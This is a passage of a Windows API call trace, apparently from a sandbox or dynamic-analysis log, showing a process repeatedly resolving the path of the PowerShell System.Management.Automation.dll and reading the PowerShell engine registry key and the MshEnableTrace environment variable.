	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.113] GetCurrentProcessId () returned 0x920
	[0309.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.115] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5f8 | out: phkResult=0x12d5f8*=0x398) returned 0x0
	[0309.115] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d57c, lpData=0x0, lpcbData=0x12d578*=0x0 | out: lpType=0x12d57c*=0x1, lpData=0x0, lpcbData=0x12d578*=0x56) returned 0x0
	[0309.115] CoTaskMemAlloc (cb=0x5a) returned 0x3646f0
	[0309.115] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d54c, lpData=0x3646f0, lpcbData=0x12d548*=0x56 | out: lpType=0x12d54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d548*=0x56) returned 0x0
	[0309.115] CoTaskMemFree (pv=0x3646f0) 
	[0309.116] RegCloseKey (hKey=0x398) returned 0x0
	[0309.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.117] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0309.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.118] CoTaskMemFree (pv=0x3a6ee0) 
	[0309.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
